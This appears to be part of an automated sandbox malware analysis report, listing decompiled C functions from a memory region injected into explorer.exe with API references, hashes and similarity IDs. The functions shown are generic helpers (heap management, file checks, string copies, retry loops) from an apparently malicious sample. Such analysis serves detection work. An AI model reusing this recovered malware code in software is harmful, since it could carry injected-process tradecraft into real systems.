                  • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



                  0x0008b27c

                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                  • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}




                  0x000885f8
                  0x000885fe
                  0x00088603

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                  • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0xe7fd30
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0xe7fd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0xe7fd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0xe7fd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0xe7fd30
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0); // executed
				}
				return 0;
			}

























                  0x0008f9c5
                  0x0008f9cd
                  0x0008f9d2
                  0x0008f9d8
                  0x0008f9de
                  0x0008f9f1
                  0x0008f9fb
                  0x0008fa05
                  0x0008fa08
                  0x0008fa0d
                  0x0008fa23
                  0x0008fa27
                  0x0008fa2c
                  0x0008fa2d
                  0x0008fa2e
                  0x0008fa33
                  0x0008fa36
                  0x0008fa37
                  0x0008fa38
                  0x0008fa3d
                  0x0008fa4c
                  0x0008fa51
                  0x0008fa56
                  0x0008fa5d
                  0x0008fa66
                  0x0008fa6b
                  0x0008fa6e
                  0x0008fa71
                  0x0008fa76
                  0x0008fa7c
                  0x0008fa81
                  0x0008fa86
                  0x0008fa89
                  0x0008fa9c
                  0x0008faa1
                  0x0008faa4
                  0x0008faa4
                  0x0008faac
                  0x0008fab7
                  0x0008fabc
                  0x0008fabf
                  0x0008fac2
                  0x0008fac2
                  0x0008fac8
                  0x0008faca
                  0x0008face
                  0x0008fad9
                  0x0008fade
                  0x0008fae3
                  0x00000000
                  0x00000000
                  0x0008faec
                  0x0008faf2
                  0x0008faf9
                  0x0008fafb
                  0x0008fafe
                  0x00000000
                  0x0008fafe
                  0x00000000
                  0x0008faf9
                  0x0008fb0b
                  0x0008fb14
                  0x0008fb18

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapSleep
                  • String ID:
                  • API String ID: 4201116106-0
                  • Opcode ID: 3e9156b20eb59e4c92d6fc07c2995c12944233af2d15c75beb7f17b6c82190fb
                  • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                  • Opcode Fuzzy Hash: 3e9156b20eb59e4c92d6fc07c2995c12944233af2d15c75beb7f17b6c82190fb
                  • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0xe7f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}
















                  0x00088975
                  0x0008897c
                  0x0008897e
                  0x00088986
                  0x00088988
                  0x00088990
                  0x00088992
                  0x00088995
                  0x00088998
                  0x000889ac
                  0x000889b3
                  0x000889b9
                  0x000889c2
                  0x00088a1a
                  0x00088a1f
                  0x00088a28
                  0x00088a75
                  0x00088a78
                  0x00088a80
                  0x00088a84
                  0x00088a84
                  0x00088a89
                  0x00000000
                  0x00088a89
                  0x00088a2a
                  0x00088a2c
                  0x00088a34
                  0x00088a3a
                  0x00088a3b
                  0x00088a3b
                  0x00088a43
                  0x00088a46
                  0x00088a4b
                  0x00088a4b
                  0x00088a4e
                  0x00088a57
                  0x00088a5c
                  0x00088a62
                  0x00088a69
                  0x00000000
                  0x00088a6f
                  0x000889cb
                  0x000889d0
                  0x000889d2
                  0x000889d9
                  0x00000000
                  0x00000000
                  0x000889ee
                  0x00000000
                  0x000889f0
                  0x000889f0
                  0x000889fb
                  0x000889fe
                  0x00088a0b
                  0x00000000
                  0x00088a11
                  0x000889ee
                  0x0008899a
                  0x00000000

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcpyn
                  • String ID:
                  • API String ID: 680773602-0
                  • Opcode ID: df6e4e06fa4588dcc84ebd37a97368978606898b48b93b123ffa302d6b09557c
                  • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                  • Opcode Fuzzy Hash: df6e4e06fa4588dcc84ebd37a97368978606898b48b93b123ffa302d6b09557c
                  • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0xe7fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0xe7fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0xe7fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00088604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0xe7fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}





















                  0x0008e2c6
                  0x0008e2d9
                  0x0008e2e0
                  0x0008e2e9
                  0x0008e2f1
                  0x0008e2f7
                  0x0008e2fc
                  0x0008e307
                  0x0008e30c
                  0x0008e3a5
                  0x0008e3a5
                  0x0008e3ad
                  0x00000000
                  0x0008e3b2
                  0x0008e313
                  0x0008e316
                  0x0008e31d
                  0x0008e32d
                  0x0008e333
                  0x0008e343
                  0x0008e348
                  0x0008e34d
                  0x0008e354
                  0x0008e358
                  0x0008e35f
                  0x0008e363
                  0x0008e367
                  0x0008e368
                  0x0008e36b
                  0x0008e370
                  0x0008e379
                  0x0008e385
                  0x0008e38f
                  0x0008e394
                  0x0008e394
                  0x0008e379
                  0x0008e39a
                  0x0008e39b
                  0x00000000
                  0x0008e3a4
                  0x00000000

                  APIs
                  • Sleep.KERNELBASE(0000000A), ref: 0008E394
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
                  • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                  • Opcode Fuzzy Hash: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
                  • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}













                  0x0008a3ed
                  0x0008a3f6
                  0x0008a3f8
                  0x0008a3fa
                  0x0008a3fe
                  0x0008a400
                  0x0008a408
                  0x0008a40f
                  0x0008a418
                  0x0008a41d
                  0x0008a422
                  0x0008a446
                  0x0008a44b
                  0x0008a451
                  0x0008a45d
                  0x0008a462
                  0x0008a424
                  0x0008a42d
                  0x0008a443
                  0x00000000
                  0x0008a42f
                  0x0008a43b
                  0x0008a440
                  0x0008a42d
                  0x0008a422
                  0x0008a465
                  0x0008a466
                  0x0008a400
                  0x0008a470

                  APIs
                    • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                  • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID:
                  • API String ID: 1452528299-0
                  • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                  • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0xe7f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}















                  0x00085d80
                  0x00085d95
                  0x00085d9e
                  0x00085da7
                  0x00085da9
                  0x00085db1
                  0x00085dc1
                  0x00085dcf
                  0x00085dd4
                  0x00085dd9
                  0x00085ddb
                  0x00085ddd
                  0x00085de2
                  0x00085de4
                  0x00085dff
                  0x00085dff
                  0x00085de6
                  0x00085de7
                  0x00085df2
                  0x00085dfa
                  0x00085dfc
                  0x00085dfc
                  0x00085de4
                  0x00085e01
                  0x00085db3
                  0x00085db4
                  0x00085db9
                  0x00085dbe
                  0x00085dbe
                  0x00085e05

                  APIs
                  • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcmpi
                  • String ID:
                  • API String ID: 1586166983-0
                  • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                  • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0xe7fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0xe7f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












                  0x0008ba0a
                  0x0008ba12
                  0x0008ba1a
                  0x0008ba1f
                  0x0008ba29
                  0x0008ba32
                  0x0008ba37
                  0x0008ba3c
                  0x0008ba5a
                  0x0008ba5d
                  0x0008ba3e
                  0x0008ba41
                  0x0008ba43
                  0x0008ba4b
                  0x0008ba4b
                  0x0008ba4e
                  0x0008ba4e
                  0x0008ba61
                  0x0008ba22
                  0x0008ba22
                  0x0008ba22

                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                  • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}











                  0x00085cec
                  0x00085cec
                  0x00085cef
                  0x00085cfe
                  0x00085d03
                  0x00085d08
                  0x00085d0f
                  0x00085d15
                  0x00085d1b
                  0x00085d21
                  0x00085d26
                  0x00085d2b
                  0x00085d33
                  0x00085d3d
                  0x00085d4b
                  0x00085d53
                  0x00085d5f
                  0x00085d67
                  0x00085d6c
                  0x00085d72
                  0x00085d7c

                  APIs
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                    • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                    • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                    • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                    • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                    • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  • memset.MSVCRT ref: 00085D5F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
                  • String ID:
                  • API String ID: 4245722550-0
                  • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
                  • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
                  • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}






                  0x0008861d
                  0x00088622
                  0x00088668
                  0x00088668
                  0x00088625
                  0x00088629
                  0x0008862b
                  0x0008862e
                  0x00088634
                  0x00088642
                  0x00088646
                  0x00088646
                  0x00088636
                  0x00088637
                  0x0008863c
                  0x0008864f
                  0x00088660
                  0x00088660
                  0x00000000

                  APIs
                  • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                  • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                  0x0008a786
                  0x0008a787
                  0x0008a78c
                  0x0008a790
                  0x0008a79f
                  0x0008a7a7
                  0x0008a7b4
                  0x00000000
                  0x0008a7b7
                  0x0008a7ab
                  0x00000000
                  0x0008a7ab
                  0x00000000

